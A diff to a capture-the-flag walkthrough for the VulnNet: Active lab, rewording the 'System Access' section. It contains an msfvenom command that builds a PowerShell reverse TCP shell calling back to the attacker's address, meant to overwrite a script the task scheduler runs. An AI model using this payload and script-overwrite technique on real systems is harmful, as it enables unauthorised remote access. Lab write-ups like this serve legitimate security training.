j-info/ctfsite/walkthroughs/2022-05-14-VulnNet-Active.md

 ## System Access

-The powershell script we saw earlier looks like it would likely be run by the task scheduler every so often, so let's see if we can overwrite that script with one of our own.
+The powershell script we saw earlier looks like it would likely be run by the task scheduler every so often, so let's see if we can overwrite that script with one of our own to get a shell back.

-I use **msfvenom** to create a reverse shell with powershell:
+I use **msfvenom** to create a reverse powershell shell:

 `msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.6.127.197 LPORT=4444 -f psh -o PurgeIrrelevantData_1826.ps1`